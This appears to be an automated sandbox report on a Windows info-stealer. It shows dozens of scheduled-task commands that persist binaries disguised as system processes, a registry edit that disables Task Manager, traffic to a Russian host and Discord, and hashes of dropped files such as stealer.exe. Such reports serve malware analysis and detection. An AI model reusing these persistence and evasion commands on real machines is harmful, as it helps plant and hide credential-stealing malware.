C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\MsWinsessiondllNet\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Windows\INF\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\INF\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Windows\INF\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\MsWinsessiondllNet\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\dllhost.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SXVJApfGP5.bat"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4756ef43-838f-41ac-b2a9-a1e264a9db1d.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\201d0dd0-dd34-4a80-b983-499984a1af49.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4ae9b577-2587-4e84-a33a-fd9cc54e5ee6.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cc73393a-21db-4920-aef5-89bb6e511a85.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e7837ef9-14b2-4386-9ccd-3c775511e365.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1fd5334d-3292-4a4f-ba80-ecac0649ffbc.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8b2c54eb-e0e1-4cf2-a59e-22e14481f541.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9845c9f8-f68f-44c0-8a0f-ab509582ad2d.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2c9836d-1c54-40a4-b2a2-595e2a692efd.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9553ac34-d8bb-4793-9745-28b9055e89ec.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\79d8d831-89f9-4762-b1a4-f88f984104fa.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92b637a2-a0f8-4de9-8f88-3395212ea9ff.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4bcc22c2-bfc5-4da7-b57a-f1d64750d21c.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a46ec459-c490-4bc4-95f6-b2f98b27fed0.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2e3b6573-9956-4c08-a354-650a54e4b5fc.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\247a55d3-4a2a-4013-90a7-551e0dba8375.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d5a02c96-5b4d-4eac-be2a-3b9ea31321b6.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\52c39398-c77a-4017-b39e-c4305685083f.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\77723675-b9f0-49d6-86aa-6fd4188fef6f.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\65e39de4-b06e-47c9-a366-406fdb705992.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\58cd3153-e99f-4382-8f9d-20b7b99c045d.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23970f29-63ea-4a42-89d3-82a0294c6654.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a20377c5-42e8-47d2-8941-150cbd2a1243.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9631333a-2d67-4b6c-ab49-1152cf25e131.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\90768ac9-f677-4eca-bfa6-2c2289da3535.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6b3188dd-0e79-4205-9c12-221b928853cf.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4fb73f37-69ab-4c36-839e-63fba0405246.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\964d59a8-da7c-427a-9df7-83d092a74dec.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 216.58.201.99:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 a0947008.xsph.ru udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
US 8.8.8.8:53 103.192.8.141.in-addr.arpa udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
US 8.8.8.8:53 48.251.17.2.in-addr.arpa udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp

Files

memory/3572-0-0x0000000000400000-0x000000000084E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\stealer.exe

MD5 8cc1e7cf94fec9bc505ce7411aa28861
SHA1 08703de84f3db427c368f16c873664d78bd83264
SHA256 cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba
SHA512 fe60f11452c9e470c0b63385cf0ee8f9fd07598c1294ba25cc8c7c093142efe865aba39680ae5f80611db9423717a7094c939f180e5195e7ae91a9633872a423

memory/2088-62-0x00007FFBA56C3000-0x00007FFBA56C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

MD5 6216b6bef94c09a40bfa263809b1ae56
SHA1 a928120e65199c6aaae6c991aa0466f3f8b06020
SHA256 eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b
SHA512 0e311738b5bdf73f01c552b59646485418ab5b99862af5da2bb934d4262307ac8f57274bbd7f6c99376e6be99d424aad5282a73a063529310425666be224d215

memory/2088-86-0x00000243043D0000-0x0000024304410000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Inject.exe

MD5 d428ddd1b0ce85a6c96765aeaf246320
SHA1 d100efdaab5b2ad851fe75a28d0aa95deb920926
SHA256 453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb
SHA512 3f9dda9d998ef282eb31644296ef0617bbf40352189f4ccd744191f466e932ffde2fd2bdaebe89f0bc06e465d57a8e46e08b3001fe834b3d989fc71125d25899

memory/2088-126-0x00007FFBA56C0000-0x00007FFBA6181000-memory.dmp

memory/4460-127-0x00007FF702DA0000-0x00007FF702DCA000-memory.dmp

C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe

MD5 7c9bb5fda146efee5ee4a243d6e404b0
SHA1 c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd
SHA256 1d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b
SHA512 797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771

memory/4772-137-0x000001B9C2140000-0x000001B9C2162000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c5s40mlo.qt2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/2088-163-0x000002431EB00000-0x000002431EB76000-memory.dmp

memory/2088-164-0x000002431EB80000-0x000002431EBD0000-memory.dmp

memory/2088-165-0x000002431EA90000-0x000002431EAAE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a58f982c18490e622e00d4eb75ace5a
SHA1 60c30527b74659ecf09089a5a7c02a1df9a71b65
SHA256 4b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d
SHA512 ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 276798eeb29a49dc6e199768bc9c2e71
SHA1 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256 cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA512 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

memory/2088-202-0x000002431ECD0000-0x000002431ECE2000-memory.dmp

memory/2088-201-0x000002431EAC0000-0x000002431EACA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ec79fae4e7c09310ebf4f2d85a33a638
SHA1 f2bdd995b12e65e7ed437d228f22223b59e76efb
SHA256 e9c4723a5fe34e081c3d2f548a1d472394cc7aa58056fcf44ca542061381243a
SHA512 af9dda12f6bb388d826fe03a4a8beed9bda23a978aa55a2af6a43271660ee896a7ee3bcf2c4d2f1e6180902791d8c23560f1c2ec097a501d8c6f4f6c49075625

C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat

MD5 ea70d7b0f1a8a1ff2d246efbdcfe1001
SHA1 252e762aee8fcc5761e17bb84aa3af8276852f5c
SHA256 1947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31
SHA512 1fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86

C:\MsWinsessiondllNet\driverBrokercommon.exe

MD5 d84e590c3715c79dc5b92c435957d162
SHA1 2901580903e4b356448d9fe7bea510261e655363
SHA256 d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba
SHA512 b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485

memory/3532-221-0x0000000000830000-0x0000000000A7A000-memory.dmp

memory/2088-225-0x00007FFBA56C0000-0x00007FFBA6181000-memory.dmp

memory/3532-227-0x00000000013E0000-0x00000000013E8000-memory.dmp

memory/3532-226-0x00000000013D0000-0x00000000013D8000-memory.dmp

memory/3532-228-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

memory/3532-229-0x0000000002CB0000-0x0000000002D06000-memory.dmp

memory/3532-231-0x0000000002D10000-0x0000000002D1C000-memory.dmp

memory/3532-230-0x0000000002D00000-0x0000000002D0C000-memory.dmp

memory/3532-232-0x0000000002D20000-0x0000000002D2C000-memory.dmp

memory/3532-234-0x0000000002D40000-0x0000000002D4A000-memory.dmp

memory/3532-235-0x0000000002D50000-0x0000000002D5E000-memory.dmp

memory/3532-236-0x0000000002E80000-0x0000000002E88000-memory.dmp

memory/3532-237-0x0000000002E90000-0x0000000002E9A000-memory.dmp

memory/3532-233-0x0000000002D30000-0x0000000002D38000-memory.dmp

memory/3532-238-0x0000000002EA0000-0x0000000002EAC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SXVJApfGP5.bat

MD5 9bb7d27e4566ce09ef791f86b09732fe
SHA1 9b7e5becf0e6dcf48a2ed150aaad53333bbfb48c
SHA256 ba97fedd893a3a6de6acfd327b5463342a494f539165238e835043fecf6d97d8
SHA512 f30137d111300079993005ef3232b888515181ed700ac13c66e980f01b1cb98536446027c10d4a6a3c6962a09846b0d1931c97f28b92ddc6c44260e4830fbb9d

C:\Users\Admin\AppData\Local\Temp\4756ef43-838f-41ac-b2a9-a1e264a9db1d.vbs

MD5 0e92844c30f1e233ad4b8044fa3cd673
SHA1 080ea409adc4d3744ed5c4712f36ef88a94a375a
SHA256 2d3ff981e4fe3853973230b37292eee9290362d7a07d9fa0f317c2ffcea3961c
SHA512 a95efc157bfd7ea44965438eb6f2b021434ad052a8dfbab38be476d15fab008cea2efd914f1bfb489e1f1aa8541e2f5164905c0aca998285cce260f0387bb9d4

C:\Users\Admin\AppData\Local\Temp\201d0dd0-dd34-4a80-b983-499984a1af49.vbs

MD5 e10487abf474865152575b2cd81910c0
SHA1 4f1c99557da2d0685d6f86e42f5e5bf76c8f5921
SHA256 6bd19066ea6ce1863ff93bf9aead7a58ea2332660def11379be9c55d1a03a3bd
SHA512 dc19bda7aeb827158be95c2d2ac9820ece72ad66139847142a155ddab2faf874edb06e60b3f6c2483847edd4af539585de0871d483e2dad3bf3461bd8fc1679b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OfficeClickToRun.exe.log

MD5 5cb90c90e96a3b36461ed44d339d02e5
SHA1 5508281a22cca7757bc4fbdb0a8e885c9f596a04
SHA256 34c15d8e79fef4bddec7e34f3426df3b68f8fc6deac29ea12d110f6c529fe3bb
SHA512 63735938c841c28824e3482559df18839930acc5ea8600b1074439b70a2f600a92f41593568e49991f25f079e7f7361b4f1678feadbf004f6e9e4d51d36598d4

C:\Users\Admin\AppData\Local\Temp\4ae9b577-2587-4e84-a33a-fd9cc54e5ee6.vbs

MD5 d549be64163140865839441e3ef85f15
SHA1 0c0de615fd32af9055dd383956ea9977be025d59
SHA256 e1334fe8bedb10b2cef710c633d2069c0d53330fc750ac0a863cf7b82cd9cc4e
SHA512 ba7f134bb8adfc57791454fe20df24df94fe9280d0e27e8047d636f2a3ca76d7978417f7e652f98c3ba4c60ce7542a4d5954b9762fdefa501aad2648ed645851

C:\Users\Admin\AppData\Local\Temp\e7837ef9-14b2-4386-9ccd-3c775511e365.vbs

MD5 4f32bce711ca904bb6878ce4bef41d41
SHA1 a3b6c98a5fa59212895dc2a77318b39b4a7e3f3c
SHA256 5dac33fef0ff4414fe21e048fce3ddf901526237fb168db55723c975bbc52d1e
SHA512 4e42efc2ead154c196aa2a5da95c992fe433de998f518b29d51aef64ab95be6256de2dea5ced7ef84e73ff87aae1b2a4caa07ab2af8dabe23dc2efe395b3c1df

C:\Users\Admin\AppData\Local\Temp\8b2c54eb-e0e1-4cf2-a59e-22e14481f541.vbs

MD5 d86460fade326da57ff0e0a6ce851553
SHA1 d312d12d6e864dfc628370fb35a637a4360082c3
SHA256 35a91c57dd4a033599b4940d426a43d0a91d2c5a1c21d89dd2a287b8face2db4
